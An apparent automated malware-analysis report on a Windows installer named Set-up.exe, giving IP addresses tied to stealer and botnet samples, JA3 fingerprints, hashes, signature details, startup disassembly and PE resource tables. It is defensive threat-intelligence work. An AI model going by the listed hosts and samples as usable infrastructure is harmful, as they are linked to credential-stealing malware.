                                                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 193.233.193.45
                                                                                                                                SecuriteInfo.com.Win32.Malware-gen.1695.31617.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                • 193.233.254.0
                                                                                                                                8mxzNuOrmA.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                                                                • 147.45.47.169
                                                                                                                                8mmCiIv2Y1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                • 147.45.45.201
                                                                                                                                8mxzNuOrmA.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                                                                • 147.45.47.169
                                                                                                                                harm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 193.233.193.45
                                                                                                                                harm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                • 193.233.193.45
                                                                                                                                CLOUDFLARENETUS2Qx5a1PR8h.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                • 172.67.133.135
                                                                                                                                RvWTDQm7yl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                vMRlWtVCEN.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                • 172.64.41.3
                                                                                                                                c54f4c04-95c8-e3ea-7c13-45cbc3ee9b45.emlGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.17.25.14
                                                                                                                                file.exeGet hashmaliciousLummaC Stealer, StealcBrowse
                                                                                                                                • 104.21.5.155
                                                                                                                                https://truckstop.one/as/authorize?client_id=7a99fb37-0cbd-4526-a557-bd283b9e9cf4&redirect_uri=https%253a%252f%252fapp.truckstop.com%252flanding%252fpingexternallogincallback&response_type=code%2520id_token%2520token&state=openidconnect.authenticationproperties%253dd1azkrievou5xvfp-qj6lz4lvhnji_zurlus4dg4kpfyaz8_l_zh9eagafd4qs-4bp_xmv_gxhfi9cicmwuipdyvxvvyerzotaovt3vtqf9ajzj3wmqtyitt_jeovipdmigoy5j_5dpehnbhcu93ulmdxyuni7lptn61kjfj7vt78qwvlvinfcjk1ngsl46tbysxh2azfm_i1dlik1uodaqthlvy6gtmnpueowutlftvhwsb7ejrpju0ggwa6pbfqx5adq&response_mode=form_post&nonce=638448261415283047.mdq2yjfinjytmwrjyi00ote4lwi3yjitodyzytm5ymu3mdbmotkxmzeyzdmtmzm5nc00yzq2lthlnjktmdvindc5njg3owjk&x-client-sku=id_net461&x-client-ver=7.0.1.0Get hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 188.114.96.3
                                                                                                                                d01SFZW0Tt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.64.41.3
                                                                                                                                http://eon.keit.re.kr/WEOMTRACK.html?CPKN=O&CPSQ=88327186&CPSC=0&CPID=16122900000005&CPMEM=MTAwMDkwODg%3D&CLID=006&CLKN=CL&CPCED=20171231&DRTMF=5&DRTMT=60&URL=https://form.jotform.com/243104959551055Get hashmaliciousUnknownBrowse
                                                                                                                                • 104.22.72.81
                                                                                                                                http://ebook-hunter.orgGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.96.3

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                a0e9f5d64349fb13191bc781f81f42e12Qx5a1PR8h.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                • 104.21.16.142
                                                                                                                                RvWTDQm7yl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.16.142
                                                                                                                                file.exeGet hashmaliciousLummaC Stealer, StealcBrowse
                                                                                                                                • 104.21.16.142
                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                • 104.21.16.142
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 104.21.16.142
                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                • 104.21.16.142
                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                • 104.21.16.142
                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.16.142
                                                                                                                                file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                • 104.21.16.142

                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                No created / dropped files found

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):6.678749159746044
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.55%
                                                                                                                                • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:Set-up.exe
                                                                                                                                File size:14'085'344 bytes
                                                                                                                                MD5:206d3ede48db6abcd0887aab3442a590
                                                                                                                                SHA1:8fcb9af4c1c4bb3af65aa5da2e12d9256b038e9e
                                                                                                                                SHA256:835a32a57441be4b9f8861e80dd7a70c724c5024743d84fea0db6de46635e449
                                                                                                                                SHA512:d7ababbac901e1e7ec0bb5642470ac2f2cea1c193213a40ebc5c902deac5192a8b5aa9aa49ee31649f7b259422ae82c057eb04df0b32630d6a20b3e9e4705a71
                                                                                                                                SSDEEP:393216:6EzwWZp/a9Z540UVD0wtIFC79QEuxXdqs2MF:6EzwWje5cIFC77+
                                                                                                                                TLSH:DFE69D21B7A18236F5F32271793DAB6E08397D724B3494CB92881C9C9DB47D24E35B27
                                                                                                                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........}....a...a...a.,.....a.,.....a.,.....a..Bb...a..Bd...a..Be...a.}Ed...a..Bd...a..d....a..d....a...`...a..Bh...a..B....a..Bc...a

                                                                                                                                File Icon

                                                                                                                                Icon Hash:2f232d67b7934633

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x6e9950
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:true
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x66ABDEBF [Thu Aug 1 19:15:11 2024 UTC]
                                                                                                                                TLS Callbacks:0x725ff0, 0x726070
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:1
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:1
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:1
                                                                                                                                Import Hash:e19cb5740593b8b2ec235286157edb32

                                                                                                                                Authenticode Signature

                                                                                                                                Signature Valid:false
                                                                                                                                Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                Error Number:-2146869232
                                                                                                                                Not Before, Not After
                                                                                                                                • 11/11/2022 00:00:00 10/11/2025 23:59:59
                                                                                                                                Subject Chain
                                                                                                                                • CN=Millionth Line AB, O=Millionth Line AB, S=Stockholms l\xe4n, C=SE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=SE, SERIALNUMBER=556906-5153
                                                                                                                                Version:3
                                                                                                                                Thumbprint MD5:0BF93D6F0762560861F26CDEB305CA2D
                                                                                                                                Thumbprint SHA-1:580CEF4C4C73245CD6A745BF09B3826BBDA8B6B4
                                                                                                                                Thumbprint SHA-256:9345A202D04D33530A672E0F389C03BB2144E42B36C8242AE2CC3C6885C072C0
                                                                                                                                Serial:009B9C9D8D51AB000F7244213C89810756

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                call 00007F006CBFA1F9h
                                                                                                                                jmp 00007F006CBF968Dh
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                push 00000000h
                                                                                                                                call dword ptr [00782128h]
                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                call dword ptr [00782344h]
                                                                                                                                push C0000409h
                                                                                                                                call dword ptr [00782340h]
                                                                                                                                push eax
                                                                                                                                call dword ptr [0078211Ch]
                                                                                                                                pop ebp
                                                                                                                                ret
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                sub esp, 00000324h
                                                                                                                                push 00000017h
                                                                                                                                call 00007F006CC167A9h
                                                                                                                                test eax, eax
                                                                                                                                je 00007F006CBF9817h
                                                                                                                                push 00000002h
                                                                                                                                pop ecx
                                                                                                                                int 29h
                                                                                                                                mov dword ptr [008E9B98h], eax
                                                                                                                                mov dword ptr [008E9B94h], ecx
                                                                                                                                mov dword ptr [008E9B90h], edx
                                                                                                                                mov dword ptr [008E9B8Ch], ebx
                                                                                                                                mov dword ptr [008E9B88h], esi
                                                                                                                                mov dword ptr [008E9B84h], edi
                                                                                                                                mov word ptr [008E9BB0h], ss
                                                                                                                                mov word ptr [008E9BA4h], cs
                                                                                                                                mov word ptr [008E9B80h], ds
                                                                                                                                mov word ptr [008E9B7Ch], es
                                                                                                                                mov word ptr [008E9B78h], fs
                                                                                                                                mov word ptr [008E9B74h], gs
                                                                                                                                pushfd
                                                                                                                                pop dword ptr [008E9BA8h]
                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                mov dword ptr [008E9B9Ch], eax
                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                mov dword ptr [008E9BA0h], eax
                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                mov dword ptr [008E9BACh], eax
                                                                                                                                mov eax, dword ptr [ebp-00000324h]
                                                                                                                                mov dword ptr [008E9AE8h], 00010001h

                                                                                                                                Rich Headers

                                                                                                                                Programming Language:
                                                                                                                                • [C++] VS2015 UPD3.1 build 24215
                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                • [RES] VS2015 UPD3 build 24213
                                                                                                                                • [LNK] VS2015 UPD3.1 build 24215

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x4d500c0x12c.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f00000x5cfffa.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xd6be000x2ee0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xac00000x3a32e.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x46b5600x70.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x46b62c0x18.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x46b5d00x40.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x3820000x484.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x3802aa0x3804003f7c774058cc5290de3cd5f69083e543unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rdata0x3820000x1549a60x154a008b0aba875816d0b88f4d01f9d3213742False0.2018814506880734data4.73043041051132IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .data0x4d70000x170100x12600f416f689fa33eeff53a7e4c6f8b71d84False0.19369153911564627OpenPGP Secret Key5.245242800830523IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .tls0x4ef0000x990x2008e3343efa9afc26ac6caf49228cbe049False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rsrc0x4f00000x5cfffa0x5d000017c8ee7a6b09307916d57eefaf3b182dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0xac00000x8d4000x8d40080818290e5c38b66ddec6925ccbbeb1eFalse0.6037368639380531data7.489395194159537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                B70x4f40bc0x540c347-zip archive data, version 0.4EnglishUnited States0.5005550384521484
                                                                                                                                RT_BITMAP0xa34cf00xa8e8Device independent bitmap graphic, 120 x 120 x 24, image size 0, resolution 3780 x 3780 px/mEnglishUnited States0.4533765032377428
                                                                                                                                RT_ICON0xa3f5d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192, 16 important colorsEnglishUnited States0.6317567567567568
                                                                                                                                RT_ICON0xa3f7000x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.5823699421965318
                                                                                                                                RT_ICON0xa3fc680x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640, 16 important colorsEnglishUnited States0.5120967741935484
                                                                                                                                RT_ICON0xa3ff500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.5455776173285198
                                                                                                                                RT_ICON0xa407f80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.36341463414634145
                                                                                                                                RT_ICON0xa40e600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.42350746268656714
                                                                                                                                RT_DIALOG0xa41d080x5adataEnglishUnited States0.7555555555555555
                                                                                                                                RT_STRING0xa41d640xd0adataEnglishUnited States0.4682444577591372
                                                                                                                                RT_STRING0xa42a700xdd2dataEnglishUnited States0.38157150932730355
                                                                                                                                RT_STRING0xa438440xc0cdataEnglishUnited States0.5239948119325551
                                                                                                                                RT_STRING0xa444500xd3cTarga image data - Color 1072 x 1093 x 32 +1083 +1075 "\257\0045\0044\004 "EnglishUnited States0.4542502951593861
                                                                                                                                RT_STRING0xa4518c0xbacdataEnglishUnited States0.499665327978581
                                                                                                                                RT_STRING0xa45d380x396dataEnglishUnited States0.6285403050108932
                                                                                                                                RT_STRING0xa460d00x2dcdataEnglishUnited States0.4959016393442623
                                                                                                                                RT_STRING0xa463ac0x282dataEnglishUnited States0.7819314641744548
                                                                                                                                RT_STRING0xa466300x2bedataEnglishUnited States0.603988603988604
                                                                                                                                RT_STRING0xa468f00x2cedataEnglishUnited States0.6782729805013927
                                                                                                                                RT_STRING0xa46bc00x1c6dataEnglishUnited States0.7026431718061674
                                                                                                                                RT_STRING0xa46d880x1d6dataEnglishUnited States0.5808510638297872
                                                                                                                                RT_STRING0xa46f600x1f0dataEnglishUnited States0.7701612903225806
                                                                                                                                RT_STRING0xa471500x1d8dataEnglishUnited States0.6334745762711864
                                                                                                                                RT_STRING0xa473280x1cadataEnglishUnited States0.7183406113537117
                                                                                                                                RT_STRING0xa474f40x21adataEnglishUnited States0.6672862453531598
                                                                                                                                RT_STRING0xa477100x28edataEnglishUnited States0.43577981651376146
                                                                                                                                RT_STRING0xa479a00x27cdataEnglishUnited States0.7468553459119497
                                                                                                                                RT_STRING0xa47c1c0x2aedataEnglishUnited States0.6749271137026239
                                                                                                                                RT_STRING0xa47ecc0x280dataEnglishUnited States0.6296875
                                                                                                                                RT_STRING0xa4814c0x152dataEnglishUnited States0.7958579881656804
                                                                                                                                RT_STRING0xa482a00xccdataEnglishUnited States0.7401960784313726
                                                                                                                                RT_STRING0xa4836c0xd2dataEnglishUnited States0.8904761904761904
                                                                                                                                RT_STRING0xa484400xeadataEnglishUnited States0.8974358974358975
                                                                                                                                RT_STRING0xa4852c0xe8dataEnglishUnited States0.7931034482758621
                                                                                                                                RT_STRING0xa486140x124dataEnglishUnited States0.8561643835616438
                                                                                                                                RT_STRING0xa487380x20cTarga image data - RLE 1083 x 1103 x 32 +1077 +1075 "A\0045\004."EnglishUnited States0.601145038167939
                                                                                                                                RT_STRING0xa489440x21cdataEnglishUnited States0.6611111111111111
                                                                                                                                RT_STRING0xa48b600x24cdataEnglishUnited States0.7261904761904762
                                                                                                                                RT_STRING0xa48dac0x1d2dataEnglishUnited States0.6609442060085837
                                                                                                                                RT_STRING0xa48f800x200dataEnglishUnited States0.75
                                                                                                                                RT_STRING0xa491800x2cedataEnglishUnited States0.564066852367688
                                                                                                                                RT_STRING0xa494500x298dataEnglishUnited States0.6204819277108434
                                                                                                                                RT_STRING0xa496e80x278dataEnglishUnited States0.7848101265822784
                                                                                                                                RT_STRING0xa499600x2d2Targa image data - Color 2379 x 2337 x 32 +2344 +2354 "8\011.\011M\011*\011(\011M\011(\011 "EnglishUnited States0.6481994459833795
                                                                                                                                RT_STRING0xa49c340x29adataEnglishUnited States0.7087087087087087
                                                                                                                                RT_STRING0xa49ed00x488dataEnglishUnited States0.5198275862068965
                                                                                                                                RT_STRING0xa4a3580x476dataEnglishUnited States0.4956217162872154
                                                                                                                                RT_STRING0xa4a7d00x49cdataEnglishUnited States0.6466101694915254
                                                                                                                                RT_STRING0xa4ac6c0x456dataEnglishUnited States0.5540540540540541
                                                                                                                                RT_STRING0xa4b0c40x3f8dataEnglishUnited States0.5974409448818898
                                                                                                                                RT_STRING0xa4b4bc0x460dataEnglishUnited States0.575
                                                                                                                                RT_STRING0xa4b91c0x4b4dataEnglishUnited States0.46677740863787376
                                                                                                                                RT_STRING0xa4bdd00x478dataEnglishUnited States0.6354895104895105
                                                                                                                                RT_STRING0xa4c2480x470dataEnglishUnited States0.5598591549295775
                                                                                                                                RT_STRING0xa4c6b80x41cdataEnglishUnited States0.5807984790874525
                                                                                                                                RT_STRING0xa4cad40x426dataEnglishUnited States0.5790960451977402
                                                                                                                                RT_STRING0xa4cefc0x488dataEnglishUnited States0.45775862068965517
                                                                                                                                RT_STRING0xa4d3840x424dataEnglishUnited States0.6490566037735849
                                                                                                                                RT_STRING0xa4d7a80x42cdataEnglishUnited States0.5608614232209738
                                                                                                                                RT_STRING0xa4dbd40x43adataEnglishUnited States0.6090573012939002
                                                                                                                                RT_STRING0xa4e0100x43cdataEnglishUnited States0.6199261992619927
                                                                                                                                RT_STRING0xa4e44c0x59cdataEnglishUnited States0.435933147632312
                                                                                                                                RT_STRING0xa4e9e80x500Targa image data - Color 2379 x 2337 x 32 +2344 +2354 "\025\011@\011 "EnglishUnited States0.6640625
                                                                                                                                RT_STRING0xa4eee80x59cdataEnglishUnited States0.5682451253481894
                                                                                                                                RT_STRING0xa4f4840x536dataEnglishUnited States0.5907046476761619
                                                                                                                                RT_STRING0xa4f9bc0x8e6dataEnglishUnited States0.5258999122036875
                                                                                                                                RT_STRING0xa502a40xc92dataEnglishUnited States0.3334369173399627
                                                                                                                                RT_STRING0xa50f380xbf4dataEnglishUnited States0.5320261437908497
                                                                                                                                RT_STRING0xa51b2c0xc5edataEnglishUnited States0.48673404927353126
                                                                                                                                RT_STRING0xa5278c0xcd8dataEnglishUnited States0.4382603406326034
                                                                                                                                RT_STRING0xa534640x92cdataEnglishUnited States0.5404599659284497
                                                                                                                                RT_STRING0xa53d900x9cedataEnglishUnited States0.3669322709163347
                                                                                                                                RT_STRING0xa547600x962dataEnglishUnited States0.5104079933388843
                                                                                                                                RT_STRING0xa550c40x986dataEnglishUnited States0.5332239540607056
                                                                                                                                RT_STRING0xa55a4c0x9d8dataEnglishUnited States0.4765873015873016
                                                                                                                                RT_STRING0xa564240x8ecdataEnglishUnited States0.563922942206655
                                                                                                                                RT_STRING0xa56d100xcc6dataEnglishUnited States0.382262996941896
                                                                                                                                RT_STRING0xa579d80xca8dataEnglishUnited States0.4367283950617284
                                                                                                                                RT_STRING0xa586800xcbedataEnglishUnited States0.5076640098099325
                                                                                                                                RT_STRING0xa593400xd0cdataEnglishUnited States0.4224550898203593
                                                                                                                                RT_STRING0xa5a04c0x8a6dataEnglishUnited States0.5519421860885275
                                                                                                                                RT_STRING0xa5a8f40x256dataEnglishUnited States0.4983277591973244
                                                                                                                                RT_STRING0xa5ab4c0x260dataEnglishUnited States0.5444078947368421
                                                                                                                                RT_STRING0xa5adac0x22edataEnglishUnited States0.6505376344086021
                                                                                                                                RT_STRING0xa5afdc0x23adataEnglishUnited States0.5333333333333333
                                                                                                                                RT_STRING0xa5b2180x288dataEnglishUnited States0.6388888888888888
                                                                                                                                RT_STRING0xa5b4a00x7a6dataEnglishUnited States0.49284984678243104
                                                                                                                                RT_STRING0xa5bc480x820dataEnglishUnited States0.46923076923076923
                                                                                                                                RT_STRING0xa5c4680x6bedataEnglishUnited States0.6292004634994206
                                                                                                                                RT_STRING0xa5cb280x7d8dataEnglishUnited States0.4960159362549801
                                                                                                                                RT_STRING0xa5d3000x636dataEnglishUnited States0.5943396226415094
                                                                                                                                RT_STRING0xa5d9380xe0dataEnglishUnited States0.10714285714285714
                                                                                                                                RT_STRING0xa5da180xe0dataEnglishUnited States0.10714285714285714
                                                                                                                                RT_STRING0xa5daf80xe0dataEnglishUnited States0.10714285714285714
                                                                                                                                RT_STRING0xa5dbd80xe0dataEnglishUnited States0.10714285714285714
                                                                                                                                RT_STRING0xa5dcb80xe0dataEnglishUnited States0.10714285714285714
                                                                                                                                RT_STRING0xa5dd980x2c4dataEnglishUnited States0.634180790960452
                                                                                                                                RT_STRING0xa5e05c0x30edataEnglishUnited States0.45524296675191817
                                                                                                                                RT_STRING0xa5e36c0x2b2dataEnglishUnited States0.6768115942028986
                                                                                                                                RT_STRING0xa5e6200x318dataEnglishUnited States0.5732323232323232
                                                                                                                                RT_STRING0xa5e9380x326dataEnglishUnited States0.6178660049627791
                                                                                                                                RT_STRING0xa5ec600x2dadataEnglishUnited States0.6328767123287671
                                                                                                                                RT_STRING0xa5ef3c0x362dataEnglishUnited States0.3972286374133949
                                                                                                                                RT_STRING0xa5f2a00x2f4dataEnglishUnited States0.6666666666666666
                                                                                                                                RT_STRING0xa5f5940x302dataEnglishUnited States0.5324675324675324
                                                                                                                                RT_STRING0xa5f8980x35adataEnglishUnited States0.5722610722610723
                                                                                                                                RT_STRING0xa5fbf40x2cadataEnglishUnited States0.6442577030812325
                                                                                                                                RT_STRING0xa5fec00x2b0dataEnglishUnited States0.39098837209302323
                                                                                                                                RT_STRING0xa601700x2badataEnglishUnited States0.670487106017192
                                                                                                                                RT_STRING0xa6042c0x2f0dataEnglishUnited States0.6316489361702128
                                                                                                                                RT_STRING0xa6071c0x2fadataEnglishUnited States0.573490813648294
                                                                                                                                RT_STRING0xa60a180x2c2dataEnglishUnited States0.6147308781869688
                                                                                                                                RT_STRING0xa60cdc0x34cdataEnglishUnited States0.39691943127962087
                                                                                                                                RT_STRING0xa610280x3a4dataEnglishUnited States0.5482832618025751
                                                                                                                                RT_STRING0xa613cc0x34cdataEnglishUnited States0.566350710900474
                                                                                                                                RT_STRING0xa617180x372dataEnglishUnited States0.4580498866213152
                                                                                                                                RT_STRING0xa61a8c0x2a4dataEnglishUnited States0.628698224852071
                                                                                                                                RT_STRING0xa61d300x29adataEnglishUnited States0.506006006006006
                                                                                                                                RT_STRING0xa61fcc0x2b4dataEnglishUnited States0.5520231213872833
                                                                                                                                RT_STRING0xa622800x290dataEnglishUnited States0.6829268292682927
                                                                                                                                RT_STRING0xa625100x274dataEnglishUnited States0.5589171974522293
                                                                                                                                RT_STRING0xa627840x25edataEnglishUnited States0.6897689768976898
                                                                                                                                RT_STRING0xa629e40x304dataEnglishUnited States0.5375647668393783
                                                                                                                                RT_STRING0xa62ce80x334dataEnglishUnited States0.5536585365853659
                                                                                                                                RT_STRING0xa6301c0x2e6dataEnglishUnited States0.6819407008086253
                                                                                                                                RT_STRING0xa633040x2fadataEnglishUnited States0.5603674540682415
                                                                                                                                RT_STRING0xa636000x274dataEnglishUnited States0.6449044585987261
                                                                                                                                RT_STRING0xa638740x33adataEnglishUnited States0.5581113801452785
                                                                                                                                RT_STRING0xa63bb00x37cdataEnglishUnited States0.5302690582959642
                                                                                                                                RT_STRING0xa63f2c0x2fedataEnglishUnited States0.6945169712793734
                                                                                                                                RT_STRING0xa6422c0x34cdataEnglishUnited States0.5592417061611374
                                                                                                                                RT_STRING0xa645780x31cdataEnglishUnited States0.6344221105527639
                                                                                                                                RT_STRING0xa648940x464dataEnglishUnited States0.5729537366548043
                                                                                                                                RT_STRING0xa64cf80x4d8dataEnglishUnited States0.46048387096774196
                                                                                                                                RT_STRING0xa651d00x3bcdataEnglishUnited States0.6527196652719666
                                                                                                                                RT_STRING0xa6558c0x45edataEnglishUnited States0.5330948121645797
                                                                                                                                RT_STRING0xa659ec0x44adataEnglishUnited States0.5819672131147541
                                                                                                                                RT_STRING0xa65e380x10cdataEnglishUnited States0.8470149253731343
                                                                                                                                RT_STRING0xa65f440xc0dataEnglishUnited States0.7864583333333334
                                                                                                                                RT_STRING0xa660040xe6StarOffice Gallery theme \372, 154195760 objects, 1st \356\020\333\020\320\020\340\020\324\020\321\020\320\020\010EnglishUnited States0.9304347826086956
                                                                                                                                RT_STRING0xa660ec0xcedataEnglishUnited States0.7766990291262136
                                                                                                                                RT_STRING0xa661bc0xe6dataEnglishUnited States0.8608695652173913
                                                                                                                                RT_STRING0xa662a40x872dataEnglishUnited States0.543940795559667
                                                                                                                                RT_STRING0xa66b180xbf6dataEnglishUnited States0.3791639451338994
                                                                                                                                RT_STRING0xa677100xa84dataEnglishUnited States0.5824665676077266
                                                                                                                                RT_STRING0xa681940xba8dataEnglishUnited States0.47989276139410186
                                                                                                                                RT_STRING0xa68d3c0xb46dataEnglishUnited States0.5246015246015246
                                                                                                                                RT_STRING0xa698840x406dataEnglishUnited States0.629126213592233
                                                                                                                                RT_STRING0xa69c8c0x216dataEnglishUnited States0.50187265917603
                                                                                                                                RT_STRING0xa69ea40x204dataEnglishUnited States0.7596899224806202
                                                                                                                                RT_STRING0xa6a0a80x212dataEnglishUnited States0.6754716981132075
                                                                                                                                RT_STRING0xa6a2bc0x22cdataEnglishUnited States0.6151079136690647
                                                                                                                                RT_STRING0xa6a4e80x230dataEnglishUnited States0.6839285714285714
                                                                                                                                RT_STRING0xa6a7180x2fedataEnglishUnited States0.46344647519582244
                                                                                                                                RT_STRING0xa6aa180x312dataEnglishUnited States0.6743002544529262
                                                                                                                                RT_STRING0xa6ad2c0x2e8dataEnglishUnited States0.706989247311828
                                                                                                                                RT_STRING0xa6b0140x2f0dataEnglishUnited States0.5651595744680851
                                                                                                                                RT_STRING0xa6b3040x1eedataEnglishUnited States0.7489878542510121
                                                                                                                                RT_STRING0xa6b4f40x2c0dataEnglishUnited States0.48579545454545453
                                                                                                                                RT_STRING0xa6b7b40x25edataEnglishUnited States0.5429042904290429
                                                                                                                                RT_STRING0xa6ba140x20cdataEnglishUnited States0.6717557251908397
                                                                                                                                RT_STRING0xa6bc200x272dataEnglishUnited States0.5015974440894568
                                                                                                                                RT_STRING0xa6be940x2e4dataEnglishUnited States0.6851351351351351
                                                                                                                                RT_STRING0xa6c1780x846dataEnglishUnited States0.40557129367327666
                                                                                                                                RT_STRING0xa6c9c00x7b8dataEnglishUnited States0.4473684210526316
                                                                                                                                RT_STRING0xa6d1780x716dataEnglishUnited States0.5931642778390298
                                                                                                                                RT_STRING0xa6d8900x7c4dataEnglishUnited States0.44969818913480886
                                                                                                                                RT_STRING0xa6e0540x65cdataEnglishUnited States0.5706388206388207
                                                                                                                                RT_STRING0xa6e6b00xa9edataEnglishUnited States0.40066225165562913
                                                                                                                                RT_STRING0xa6f1500xa76dataEnglishUnited States0.39357729648991785
                                                                                                                                RT_STRING0xa6fbc80x93cdataEnglishUnited States0.5376480541455161
                                                                                                                                RT_STRING0xa705040xa4adataEnglishUnited States0.43242217160212604
                                                                                                                                RT_STRING0xa70f500x8b8dataEnglishUnited States0.5013440860215054
                                                                                                                                RT_STRING0xa718080x238dataEnglishUnited States0.6355633802816901
                                                                                                                                RT_STRING0xa71a400x1f2dataEnglishUnited States0.5120481927710844
                                                                                                                                RT_STRING0xa71c340x1dedataEnglishUnited States0.7510460251046025
                                                                                                                                RT_STRING0xa71e140x200Targa image data - Color 1072 x 1078 x 32 +1083 +1075 "1\0040\0049\004=\0040\004."EnglishUnited States0.615234375
